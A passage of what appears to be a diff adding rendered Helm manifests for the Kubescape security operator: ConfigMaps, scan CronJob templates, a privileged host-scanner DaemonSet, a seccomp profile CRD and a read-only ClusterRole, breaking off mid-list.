GtpbUZybEc4QmErMHQ3SHN3cgotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: ks-cloud-config + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + kubescape.io/infra: config +data: + clusterData: "{\n \"serviceDiscovery\": false,\n \"vulnScanURL\": \"kubevuln:8080\"\ + ,\n \"kubevulnURL\": \"kubevuln:8080\",\n \"kubescapeURL\": \"kubescape:8080\"\ + ,\n \"clusterName\": \"bobexample\",\n \"storage\": true,\n \"relevantImageVulnerabilitiesEnabled\"\ + : true,\n \"namespace\": \"honey\",\n \"imageVulnerabilitiesScanningEnabled\"\ + : true,\n \"postureScanEnabled\": true,\n \"otelCollector\": false,\n \"nodeAgent\"\ + : \"true\",\n \"maxImageSize\": 5.36870912e+09,\n \"maxSBOMSize\": 2.097152e+07,\n\ + \ \"keepLocal\": true,\n \"scanTimeout\": \"5m\",\n \"scanEmbeddedSBOMs\":\ + \ false,\n \"vexGeneration\": false,\n \"useDefaultMatchers\": false,\n \"\ + storeFilteredSbom\": false,\n \"continuousPostureScan\": false,\n \"relevantImageVulnerabilitiesConfiguration\"\ + : \"enable\"\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: ks-capabilities + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + 
app.kubernetes.io/component: ks-capabilities + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-capabilities + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + capabilities: "{\n \"capabilities\":{\"admissionController\":\"enable\",\"autoUpgrading\"\ + :\"disable\",\"configurationScan\":\"enable\",\"continuousScan\":\"disable\",\"\ + httpDetection\":\"enable\",\"kubescapeOffline\":\"disable\",\"malwareDetection\"\ + :\"disable\",\"manageWorkloads\":\"disable\",\"networkEventsStreaming\":\"disable\"\ + ,\"networkPolicyService\":\"enable\",\"nodeProfileService\":\"enable\",\"nodeSbomGeneration\"\ + :\"enable\",\"nodeScan\":\"enable\",\"operator\":\"enable\",\"prometheusExporter\"\ + :\"enable\",\"relevancy\":\"enable\",\"runtimeDetection\":\"enable\",\"runtimeObservability\"\ + :\"enable\",\"scanEmbeddedSBOMs\":\"disable\",\"seccompProfileBackend\":\"crd\"\ + ,\"seccompProfileService\":\"enable\",\"syncSBOM\":\"disable\",\"testing\":{\"\ + nodeAgentMultiplication\":{\"enabled\":false,\"replicas\":5}},\"vexGeneration\"\ + :\"disable\",\"vulnerabilityScan\":\"enable\"},\n \"components\":{\"autoUpdater\"\ + :{\"enabled\":false},\"clamAV\":{\"enabled\":false},\"cloudSecret\":{\"create\"\ + :true,\"name\":\"cloud-secret\"},\"customCaCertificates\":{\"name\":\"custom-ca-certificates\"\ + },\"hostScanner\":{\"enabled\":true},\"kubescape\":{\"enabled\":true},\"kubescapeScheduler\"\ + :{\"enabled\":true},\"kubevuln\":{\"enabled\":true},\"kubevulnScheduler\":{\"\ + enabled\":true},\"nodeAgent\":{\"enabled\":true},\"operator\":{\"enabled\":true},\"\ + otelCollector\":{\"enabled\":false},\"prometheusExporter\":{\"enabled\":true},\"\ + serviceDiscovery\":{\"enabled\":false},\"storage\":{\"enabled\":true},\"synchronizer\"\ + :{\"enabled\":false}},\n \"configurations\":{\"excludeJsonPaths\":null,\"otelUrl\"\ + :null,\"persistence\":\"enable\",\"priorityClass\":{\"daemonset\":100000100,\"\ + enabled\":true},\"prometheusAnnotations\":\"disable\"} ,\n \"serviceScanConfig\"\ + \ :{\"enabled\":false,\"interval\":\"1h\"}\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: cs-matching-rules + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + matchingRules.json: '{"match":[{"apiGroups":["apps"],"apiVersions":["v1"],"resources":["deployments"]}],"namespaces":["default"]} + + ' +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubescape-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + request-body.json: '{"commands":[{"CommandName":"kubescapeScan","args":{"scanV1":{}}}]}' +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: host-scanner-definition + namespace: honey + annotations: null + labels: + 
helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + host-scanner-yaml: "apiVersion: apps/v1\nkind: DaemonSet\nmetadata:\n name: host-scanner\n\ + \ namespace: honey\n annotations:\n \n argocd.argoproj.io/compare-options:\ + \ \"IgnoreExtraneous\"\n argocd.argoproj.io/sync-options: \"Prune=false\"\n\ + \ labels:\n helm.sh/chart: kubescape-operator-1.30.2\n app.kubernetes.io/name:\ + \ kubescape-operator\n app.kubernetes.io/instance: kubescape\n app.kubernetes.io/component:\ + \ host-scanner\n app.kubernetes.io/version: \"1.30.2\"\n app.kubernetes.io/managed-by:\ + \ Helm\n app.kubernetes.io/part-of: kubescape\n app: host-scanner\n tier:\ + \ ks-control-plane\n kubescape.io/ignore: \"true\"\nspec:\n selector:\n \ + \ matchLabels:\n app.kubernetes.io/name: kubescape-operator\n app.kubernetes.io/instance:\ + \ kubescape\n app.kubernetes.io/component: host-scanner\n template:\n \ + \ metadata:\n annotations:\n \n argocd.argoproj.io/compare-options:\ + \ \"IgnoreExtraneous\"\n argocd.argoproj.io/sync-options: \"Prune=false\"\ + \n labels:\n helm.sh/chart: kubescape-operator-1.30.2\n app.kubernetes.io/name:\ + \ kubescape-operator\n app.kubernetes.io/instance: kubescape\n app.kubernetes.io/component:\ + \ host-scanner\n app.kubernetes.io/version: \"1.30.2\"\n app.kubernetes.io/managed-by:\ + \ Helm\n app.kubernetes.io/part-of: kubescape\n app: host-scanner\n\ + \ tier: ks-control-plane\n kubescape.io/ignore: \"true\"\n \ + \ kubescape.io/tier: \"core\"\n name: host-scanner\n spec:\n \ + \ nodeSelector:\n kubernetes.io/os: linux\n affinity:\n tolerations:\n\ + \ - effect: NoSchedule\n key: node-role.kubernetes.io/control-plane\n\ + \ operator: Exists\n - effect: NoSchedule\n key: node-role.kubernetes.io/master\n\ + \ operator: Exists\n containers:\n - name: host-sensor\n \ + \ image: \"quay.io/kubescape/host-scanner:v1.0.78\"\n imagePullPolicy:\ + \ IfNotPresent\n securityContext:\n allowPrivilegeEscalation:\ + \ true\n privileged: true\n readOnlyRootFilesystem: true\n \ + \ env:\n - name: KS_LOGGER_LEVEL\n value: \"info\"\n \ + \ - name: KS_LOGGER_NAME\n value: \"zap\"\n ports:\n \ + \ - name: scanner # Do not change port name\n containerPort: 7888\n\ + \ protocol: TCP\n resources:\n limits:\n \ + \ cpu: 0.4m\n memory: 400Mi\n requests:\n cpu:\ + \ 0.1m\n memory: 200Mi\n volumeMounts:\n - mountPath:\ + \ /host_fs\n name: host-filesystem\n startupProbe:\n \ + \ httpGet:\n path: /readyz\n port: 7888\n failureThreshold:\ + \ 30\n periodSeconds: 1\n livenessProbe:\n httpGet:\n\ + \ path: /healthz\n port: 7888\n periodSeconds:\ + \ 10\n terminationGracePeriodSeconds: 120\n dnsPolicy: ClusterFirstWithHostNet\n\ + \ serviceAccountName: node-agent\n automountServiceAccountToken: false\n\ + \ volumes:\n - hostPath:\n path: /\n type: Directory\n\ + \ name: host-filesystem\n hostPID: true\n hostIPC: true" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubevuln-scheduler + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + 
app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + request-body.json: '{"commands":[{"commandName":"scan","designators":[{"designatorType":"Attributes","attributes":{}}]}]}' +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"applicationProfileServiceEnabled\": true,\n \"backendStorageEnabled\"\ + : false,\n \"prometheusExporterEnabled\": true,\n \"runtimeDetectionEnabled\"\ + : true,\n \"httpDetectionEnabled\": true,\n \"networkServiceEnabled\": true,\n\ + \ \"malwareDetectionEnabled\": false,\n \"hostMalwareSensorEnabled\": false,\n\ + \ \"hostNetworkSensorEnabled\": false,\n \"nodeProfileServiceEnabled\":\ + \ false,\n \"networkStreamingEnabled\": false,\n \"maxImageSize\": 5.36870912e+09,\n\ + \ \"maxSBOMSize\": 2.097152e+07,\n \"sbomGenerationEnabled\": true,\n \ + \ \"enableEmbeddedSBOMs\": false,\n \"seccompServiceEnabled\": true,\n \ + \ \"seccompProfileBackend\": \"crd\",\n \"initialDelay\": \"2m\",\n \"updateDataPeriod\"\ + : \"10000m\",\n \"nodeProfileInterval\": \"10m\",\n \"networkStreamingInterval\"\ + : \"2m\",\n \"maxSniffingTimePerContainer\": \"2m\",\n \"excludeNamespaces\"\ + : \"kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse\"\ + ,\n \"excludeLabels\":null,\n \"exporters\": {\n \"alertManagerExporterUrls\"\ + :[],\n \"stdoutExporter\":true,\n \"syslogExporterURL\": \"\"\n },\n\ + \ \"excludeJsonPaths\":null,\n \"ruleCooldown\": {\n \"ruleCooldownDuration\"\ + : \"0h\",\n \"ruleCooldownAfterCount\": 1e+09,\n \"ruleCooldownOnProfileFailure\"\ + : false,\n \"ruleCooldownMaxSize\": 20000\n }\n}\n" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"excludeNamespaces\": \"kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse\"\ + ,\n \"namespace\": \"honey\",\n \"triggersecurityframework\": true,\n \"podScanGuardTime\"\ + : \"1h\",\n \"excludeJsonPaths\":null,\n \"httpExporterConfig\":{\"maxAlertsPerMinute\"\ + :1000,\"method\":\"POST\",\"url\":\"http://synchronizer:8089/apis/v1/kubescape.io\"\ + },\n \"nodeAgentAutoscaler\": {\n \"enabled\": false,\n \"nodeGroupLabel\"\ + : \"node.kubernetes.io/instance-type\",\n \"resourcePercentages\": {\n \ + \ \"requestCPU\": 2,\n \"requestMemory\": 2,\n \"limitCPU\": 5,\n \ + \ \"limitMemory\": 5\n },\n \"minResources\": {\n \"cpu\": \"100m\"\ + 
,\n \"memory\": \"600Mi\"\n },\n \"maxResources\": {\n \"cpu\"\ + : \"2000m\",\n \"memory\": \"4Gi\"\n },\n \"reconcileInterval\": \"\ + 5m\",\n \"templatePath\": \"/etc/templates/daemonset-template.yaml\",\n \ + \ \"operatorDeploymentName\": \"operator\"\n }\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubescape-cronjob-template + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: kubescape-scheduler\n\ + \ namespace: honey\n labels:\n app: kubescape-scheduler\n tier: ks-control-plane\n\ + \ kubescape.io/tier: \"core\"\n armo.tier: \"kubescape-scan\"\nspec:\n \ + \ schedule: \"0 8 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit:\ + \ 1\n jobTemplate:\n spec:\n template:\n metadata:\n \ + \ labels:\n armo.tier: \"kubescape-scan\"\n kubescape.io/tier:\ + \ \"core\"\n spec:\n securityContext:\n seccompProfile:\n\ + \ type: RuntimeDefault\n containers:\n - name:\ + \ kubescape-scheduler\n image: \"quay.io/kubescape/http-request:v0.2.16\"\ + \n imagePullPolicy: IfNotPresent\n securityContext:\n \ + \ allowPrivilegeEscalation: false\n readOnlyRootFilesystem:\ + \ true\n runAsNonRoot: true\n runAsUser: 100\n \ + \ resources:\n limits:\n cpu: 10m\n \ + \ memory: 20Mi\n requests:\n cpu: 1m\n \ + \ memory: 10Mi\n args:\n - -method=post\n \ + \ - -scheme=http\n - -host=operator:4002\n \ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubescape\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: kubescape-scheduler" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubevuln-cronjob-template + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: kubevuln-scheduler\n\ + \ namespace: honey\n labels:\n app: kubevuln-scheduler\n tier: ks-control-plane\n\ + \ kubescape.io/tier: \"core\"\n armo.tier: \"vuln-scan\"\nspec:\n schedule:\ + \ \"0 0 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit: 1\n\ + \ jobTemplate:\n spec:\n template:\n metadata:\n labels:\n\ + \ armo.tier: \"vuln-scan\"\n kubescape.io/tier: \"core\"\ + \n spec:\n securityContext:\n seccompProfile:\n \ + \ type: RuntimeDefault\n containers:\n - name: kubevuln-scheduler\n\ + \ image: \"quay.io/kubescape/http-request:v0.2.16\"\n imagePullPolicy:\ + \ 
IfNotPresent\n securityContext:\n allowPrivilegeEscalation:\ + \ false\n readOnlyRootFilesystem: true\n runAsNonRoot:\ + \ true\n runAsUser: 100\n resources:\n limits:\n\ + \ cpu: 10m\n memory: 20Mi\n requests:\n\ + \ cpu: 1m\n memory: 10Mi\n args:\n \ + \ - -method=post\n - -scheme=http\n - -host=operator:4002\n\ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubevuln\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: kubevuln-scheduler" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + name: registry-scan-cronjob-template +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: registry-scheduler\n\ + \ namespace: honey\n labels:\n app: registry-scheduler\n kubescape.io/tier:\ + \ \"core\"\n tier: ks-control-plane\n armo.tier: \"registry-scan\"\nspec:\n\ + \ schedule: \"0 0 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit:\ + \ 1\n jobTemplate:\n spec:\n template:\n metadata:\n \ + \ labels:\n armo.tier: \"registry-scan\"\n kubescape.io/tier:\ + \ \"core\"\n spec:\n securityContext:\n seccompProfile:\n\ + \ type: RuntimeDefault\n containers:\n - name:\ + \ registry-scheduler\n image: \"quay.io/kubescape/http-request:v0.2.16\"\ + \n imagePullPolicy: IfNotPresent\n securityContext:\n \ + \ allowPrivilegeEscalation: false\n readOnlyRootFilesystem:\ + \ true\n runAsNonRoot: true\n runAsUser: 100\n \ + \ resources:\n limits:\n cpu: 10m\n \ + \ memory: 20Mi\n requests:\n cpu: 1m\n \ + \ memory: 10Mi\n args:\n - -method=post\n \ + \ - -scheme=http\n - -host=operator:4002\n \ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubevuln\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: registry-scheduler" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: storage + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"cleanupInterval\": \"6h\",\n \"disableVirtualCRDs\": false,\n\ + \ 
\"disableSeccompProfileEndpoint\": true,\n \"excludeJsonPaths\": null,\n \ + \ \"defaultQueueLength\": 100,\n \"defaultWorkerCount\": 2,\n \"defaultMaxObjectSize\"\ + : 400000,\n \"queueManagerEnabled\": true,\n \"kindQueues\": {\"applicationprofiles\"\ + :{\"maxObjectSize\":20000000,\"queueLength\":50,\"workerCount\":2},\"containerprofiles\"\ + :{\"maxObjectSize\":2500000,\"queueLength\":50,\"workerCount\":2},\"networkneighborhoods\"\ + :{\"maxObjectSize\":10000000,\"queueLength\":50,\"workerCount\":2},\"openvulnerabilityexchangecontainers\"\ + :{\"maxObjectSize\":500000,\"queueLength\":50,\"workerCount\":1},\"sbomsyftfiltereds\"\ + :{\"maxObjectSize\":50000000,\"queueLength\":50,\"workerCount\":1},\"sbomsyfts\"\ + :{\"maxObjectSize\":100000000,\"queueLength\":50,\"workerCount\":1},\"vulnerabilitymanifests\"\ + :{\"maxObjectSize\":50000000,\"queueLength\":50,\"workerCount\":1}},\n \"tlsClientCaFile\"\ + : \"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt\",\n \"tlsServerCertFile\"\ + : \"/etc/storage-ca-certificates/tls.crt\",\n \"tlsServerKeyFile\": \"/etc/storage-ca-certificates/tls.key\"\ + ,\n \"serverBindPort\": \"8443\"\n}\n" +--- +apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: kubescape-storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 5Gi +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: seccompprofiles.kubescape.io + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: seccompprofile + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: seccompprofile + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + group: kubescape.io + names: + plural: seccompprofiles + singular: seccompprofile + kind: SeccompProfile + listKind: SeccompProfileList + shortNames: + - scp + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + apiVersion: + type: string + kind: + type: string + metadata: + type: object + spec: + type: object + properties: + containers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + 
type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + initContainers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the init container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + ephemeralContainers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the ephemeral container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + 
type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + status: + type: object + properties: + containers: + type: object + additionalProperties: + type: object + properties: + conditions: + type: array + items: + type: object + properties: + type: + type: string + description: Type of this condition + status: + type: string + description: Status of this condition (True, False, Unknown) + lastTransitionTime: + type: string + format: date-time + description: Last time this condition transitioned + reason: + type: string + description: Reason for this condition's last transition + message: + type: string + description: Message about this condition's last transition + status: + type: string + description: Profile state + path: + type: string + description: Path to the seccomp profile + activeWorkloads: + type: array + items: + type: string + description: Active workloads using this profile + localhostProfile: + type: string + description: Path for securityContext.seccompProfile.localhostProfile + subresources: + status: {} + additionalPrinterColumns: + - name: Age + type: date + jsonPath: .metadata.creationTimestamp +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - pods + - pods/proxy + - namespaces + - nodes + - configmaps + - services + - serviceaccounts + - endpoints + - persistentvolumeclaims + - persistentvolumes + - limitranges + - replicationcontrollers + - podtemplates + - resourcequotas + - events + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - secrets + verbs: + - get + - watch + - list +- apiGroups: + - admissionregistration.k8s.io + resources: + - mutatingwebhookconfigurations + - validatingwebhookconfigurations + verbs: + - get + - watch + - list +- apiGroups: + - apiregistration.k8s.io + resources: + - apiservices + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - deployments + - statefulsets + - daemonsets + - replicasets + - controllerrevisions + verbs: + - get + - watch + - list +- apiGroups: + - autoscaling + resources: + - horizontalpodautoscalers + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list +- apiGroups: + - coordination.k8s.io + resources: + - leases + verbs: + - get + - watch + - list +- apiGroups: + - discovery.k8s.io + resources: + - endpointslices + verbs: + - get + - watch + - list +- apiGroups: + - events.k8s.io + resources: + - events + verbs: + - get + - watch + - list +- apiGroups: + - hostdata.kubescape.cloud + resources: + - APIServerInfo + - ControlPlaneInfo + verbs: + - get + - watch + - list +- apiGroups: + - networking.k8s.io 
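+# Note on RBAC naming: rules match the lowercase plural resource name served
+# by the API (e.g. 'ingresses', 'podsecuritypolicies'); a capitalized kind
+# name in a rule matches no resource and grants nothing. Illustrative check
+# once the bindings below are applied (names assumed from this chart render):
+#   kubectl auth can-i list networkpolicies.networking.k8s.io \
+#     --as=system:serviceaccount:honey:kubescape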
+ resources: + - networkpolicies + - ingresses + verbs: + - get + - watch + - list +- apiGroups: + - cilium.io + resources: + - ciliumnetworkpolicies + verbs: + - get + - list + - watch +- apiGroups: + - projectcalico.org + resources: + - networkpolicies + verbs: + - get + - list + - watch +- apiGroups: + - networking.istio.io + resources: + - gateways + - virtualservices + verbs: + - get + - list + - watch +- apiGroups: + - security.istio.io + resources: + - authorizationpolicies + verbs: + - get + - list + - watch +- apiGroups: + - policy + resources: + - poddisruptionbudgets + - podsecuritypolicies + verbs: + - get + - watch + - list +- apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterroles + - clusterrolebindings + - roles + - rolebindings + verbs: + - get + - watch + - list +- apiGroups: + - storage.k8s.io + resources: + - csistoragecapacities + - storageclasses + verbs: + - get + - watch + - list +- apiGroups: + - networking.k8s.io + resources: + - ingresses + verbs: + - get + - watch + - list +- apiGroups: + - extensions + resources: + - ingresses + verbs: + - get + - watch + - list +- apiGroups: + - gateway.networking.k8s.io + resources: + - httproutes + - gateways + - gatewayclasses + - tcproutes + - tlsroutes + - 